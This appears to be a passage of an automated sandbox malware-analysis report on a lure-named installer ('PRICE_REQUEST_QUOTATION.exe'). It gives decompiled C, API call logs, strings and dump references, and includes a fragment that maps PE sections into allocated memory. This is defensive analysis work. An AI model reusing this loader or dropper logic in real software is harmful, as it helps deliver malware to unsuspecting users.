					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E7333A776(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E7333A6DB( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}

0x7333a402
0x7333a40d
0x7333a410
0x7333a414
0x7333a416
0x7333a419
0x7333a41c
0x7333a41d
0x7333a423
0x7333a424
0x7333a42a
0x7333a42e
0x7333a432
0x7333a436
0x7333a43a
0x7333a43e
0x7333a442
0x7333a459
0x7333a462
0x7333a47a
0x7333a489
0x7333a498
0x7333a4a7
0x7333a4b6
0x7333a4d3
0x7333a4dc
0x7333a4de
0x7333a4e0
0x7333a4e6
0x7333a5c6
0x7333a5c6
0x7333a5c8
0x7333a5c8
0x7333a5cb
0x7333a5cd
0x7333a5d0
0x7333a5d0
0x7333a5d5
0x00000000
0x7333a5f4
0x7333a5da
0x7333a5dc
0x7333a5de
0x7333a5ea
0x7333a5ec
0x7333a5f3
0x7333a5f3
0x7333a5ee
0x7333a5ee
0x7333a5ee
0x7333a5e0
0x7333a5e6
0x7333a5e6
0x7333a5de
0x7333a5f9
0x7333a5fe
0x7333a608
0x7333a608
0x7333a613
0x7333a613
0x7333a4ee
0x7333a4f1
0x7333a4f7
0x00000000
0x00000000
0x7333a509
0x7333a50d
0x00000000
0x7333a528
0x7333a52d
0x7333a53c
0x7333a53f
0x7333a542
0x7333a547
0x7333a5c2
0x00000000
0x7333a5c2
0x7333a550
0x7333a555
0x7333a55e
0x7333a597
0x7333a597
0x7333a5a4
0x7333a5a8
0x00000000
0x00000000
0x7333a5aa
0x7333a5af
0x7333a5b2
0x7333a5b2
0x7333a5bd
0x00000000
0x7333a560
0x7333a563
0x7333a569
0x7333a56b
0x7333a56e
0x7333a57a
0x7333a585
0x7333a58a
0x7333a58d
0x7333a590
0x7333a593
0x00000000
0x7333a56e
0x7333a55e

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333A4DC
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A506
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16), ref: 7333A51D
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A53F
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349,00000000,00000000), ref: 7333A5B2
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A5BD
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349,00000000), ref: 7333A608

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
Instruction ID: 57335164df1743bbcb08d487c935fc8a3b6535e7f5ebadc10331150790b05021
Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
Instruction Fuzzy Hash: 42619235E00304ABEB21CFB4C984BAEB7B9AF49610F54C059F562EB394EB349D42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}

0x00405ecd
0x00405ed6
0x00000000
0x00405ee3
0x00405ed9
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
FindClose.KERNEL32(00000000), ref: 00405ED9

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "jwfmxhqapdbzygp Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x004039b9
0x004039c2
0x00403b03
0x00403b07
0x00403b0b
0x00403b0d
0x00403b12
0x00403b1d
0x00403b28
0x00403b2d
0x00403b2f
0x00403b31
0x00403b34
0x00403b39
0x00403b47
0x00403b54
0x00403b5b
0x00403b5b
0x00403b5c
0x00403b5c
0x00403b61
0x00403b67
0x00403b6e
0x00403b74
0x00403b76
0x00403bb6
0x00403bbb
0x00403bc0
0x00403bc0
0x00403bc5
0x00403bce
0x00403bd0
0x00403bd5
0x00403bdb
0x00403bdf
0x00403bdf
0x00403be4
0x00403bea
0x00000000
0x00000000
0x00403bf0
0x00403bf5
0x00403bfb
0x00000000
0x00000000
0x00403c04
0x00403c0c
0x00403c11
0x00403c14
0x00403c1a
0x00403c1f
0x00403c22
0x00403c28
0x00403c2d
0x00403c30
0x00403c36
0x00403c3e
0x00403c44
0x00403c4a
0x00403c4e
0x00403c55
0x00403c55
0x00403c55
0x00403c5f
0x00403c71
0x00403c7d
0x00403c82
0x00403c8c
0x00403c92
0x00403c94
0x00403c99
0x00403c96
0x00403c96
0x00403c96
0x00403ca9
0x00403cc1
0x00403cc3
0x00403cc9
0x00403cde
0x00403ccb
0x00403cd4
0x00403cd6
0x00403cd6
0x00403ce4
0x00403cf4
0x00403d05
0x00403d0c
0x00403d12
0x00403d16
0x00403d1b
0x00403d1d
0x00000000
0x00403d23
0x00403d23
0x00403d25
0x00000000
0x00000000
0x00403d2b
0x00403d2f
0x00403d54
0x00403d5a
0x00403d60
0x00403d62
0x00000000
0x00000000
0x00403d88
0x00403d8e
0x00403d90
0x00403d95
0x00000000
0x00000000
0x00403d9b
0x00403d9e
0x00403da1
0x00403db8
0x00403dc4
0x00403ddd
0x00403de3
0x00403de7
0x00403dec
0x00403df2
0x00000000
0x00000000
0x00403dfc
0x00403e07
0x00000000
0x00403e07
0x00403d31
0x00403d37
0x00000000
0x00000000
0x00403d3d
0x00403d43
0x00000000
0x00000000
0x00000000
0x00403d49
0x00403d1d
0x00403e14
0x00403e20
0x00403e27
0x00000000
0x00403b78
0x00403b78
0x00403b7b
0x00403bae
0x00403bae
0x00403bb0
0x00000000
0x00000000
0x00000000
0x00403bb0
0x00403b7d
0x00403b81
0x00403b86
0x00403b88
0x00000000
0x00000000
0x00403b98
0x00403ba0
0x00000000
0x00403ba6
0x004039d4
0x004039d4
0x004039d8
0x004039dd
0x004039ec
0x004039ec
0x004039f5
0x004039fe
0x00403a09
0x00403a09
0x00403a15
0x00403a31
0x00403a34
0x00403a47
0x00403a4d
0x00403af0
0x00000000
0x00403af9
0x00403a53
0x00403a60
0x00403a62
0x00403a64
0x00403a83
0x00403a83
0x00403a86
0x00403a8b
0x00403a8e
0x00403a9e
0x00403a9f
0x00403aa1
0x00403ad7
0x00403aea
0x00000000
0x00403aea
0x00403aa3
0x00403aa9
0x00403ac2
0x00403ac7
0x00403ac9
0x00000000
0x00000000
0x00403acb
0x00403ab7
0x00403ab7
0x00403ab9
0x00403ab9
0x00000000
0x00403ab9
0x00403aac
0x00403ab1
0x00000000
0x00403ab1
0x00403a90
0x00403a96
0x00000000
0x00000000
0x00403a98
0x00000000
0x00403a98
0x00403a88
0x00000000
0x00403a88
0x00403a6e
0x00403a75
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00000000
0x00403a7d
0x00403a39
0x00000000
0x00403a17
0x00403a1d
0x00403a27
0x00403e2d
0x00403e33
0x00403e35
0x00403e3b
0x00403e40
0x00403e46
0x00403e46
0x00403e3b
0x00403e50
0x00000000
0x00403e50
0x00403a15

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
ShowWindow.USER32(?), ref: 00403A09
DestroyWindow.USER32 ref: 00403A1D
SetWindowLongA.USER32 ref: 00403A39
GetDlgItem.USER32 ref: 00403A5A
SendMessageA.USER32 ref: 00403A6E
IsWindowEnabled.USER32(00000000), ref: 00403A75
GetDlgItem.USER32 ref: 00403B23
GetDlgItem.USER32 ref: 00403B2D
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
SendMessageA.USER32 ref: 00403B98
GetDlgItem.USER32 ref: 00403C3E
ShowWindow.USER32(00000000,?), ref: 00403C5F
EnableWindow.USER32(?,?), ref: 00403C71
EnableWindow.USER32(?,?), ref: 00403C8C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
EnableMenuItem.USER32 ref: 00403CA9
SendMessageA.USER32 ref: 00403CC1
SendMessageA.USER32 ref: 00403CD4
lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,jwfmxhqapdbzygp Setup), ref: 00403CFD
SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
ShowWindow.USER32(?,0000000A), ref: 00403E40

Strings

jwfmxhqapdbzygp Setup, xrefs: 00403CEE

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
String ID: jwfmxhqapdbzygp Setup
API String ID: 4050669955-2118755563
Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040361A, Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x6c0230
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x6c56f4
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x54
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403620
0x00403629
0x00403630
0x00403632
0x00403646
0x00403658
0x00403662
0x00403667
0x0040366d
0x00403680
0x00403680
0x0040368b
0x00403634
0x0040363f
0x0040363f
0x00403690
0x00403695
0x0040369a
0x004036a3
0x004036a8
0x004036b9
0x00403740
0x00403748
0x00403751
0x00403751
0x00403767
0x0040376d
0x0040377b
0x0040380a
0x00403812
0x0040381c
0x00403821
0x00403827
0x004038b1
0x004038b6
0x004038b8
0x004038d4
0x00000000
0x004038d4
0x004038ba
0x004038c0
0x004038c8
0x004038c8
0x00000000
0x004038c0
0x00403835
0x00403840
0x00403845
0x00403847
0x0040384e
0x0040384e
0x00403859
0x00403861
0x00403863
0x00403865
0x0040386e
0x00403871
0x00403877
0x00403877
0x0040387d
0x00403896
0x004038a7
0x00000000
0x004038ac
0x00403814
0x00403816
0x00000000
0x00403781
0x00403781
0x00403787
0x00403791
0x00403799
0x004037a3
0x004037a9
0x004037b7
0x004038d9
0x004038d9
0x00000000
0x004038d9
0x004037bd
0x004037c6
0x00403805
0x00000000
0x00403805
0x004036bf
0x004036bf
0x004036c4
0x00000000
0x00000000
0x004036c9
0x004036ce
0x004036de
0x004036e3
0x004036ea
0x00000000
0x00000000
0x004036ee
0x004036f0
0x004036fd
0x004036fd
0x00403705
0x0040370b
0x00403733
0x0040373b
0x00000000
0x0040371d
0x0040371e
0x00403727
0x0040372d
0x0040372e
0x00000000
0x0040372e
0x00403729
0x0040372b
0x00000000
0x00000000
0x00000000
0x0040372b
0x0040370b

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000), ref: 0040368B
lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
LoadImageA.USER32 ref: 00403767

Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32

RegisterClassA.USER32 ref: 004037AE
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
CreateWindowExA.USER32 ref: 004037FF
ShowWindow.USER32(00000005,00000000), ref: 00403835
GetClassInfoA.USER32 ref: 00403861
GetClassInfoA.USER32 ref: 0040386E
RegisterClassA.USER32 ref: 00403877
DialogBoxParamA.USER32 ref: 00403896

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040369A, 004036A2, 0040373A, 00403740, 00403750
1033, xrefs: 0040363A, 00403686
RichEdit, xrefs: 00403868
_Nb, xrefs: 004037BD, 004037C2
.exe, xrefs: 0040370D
RichEd20, xrefs: 0040383B
RichEdit20A, xrefs: 00403859, 0040385F
Control Panel\Desktop\ResourceLocale, xrefs: 0040364E
TclpOwkq, xrefs: 004036CE, 004036D6, 004036E3, 0040372D, 00403733
.DEFAULT\Control Panel\International, xrefs: 00403676
RichEd32, xrefs: 00403849
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 0040361E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403626

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
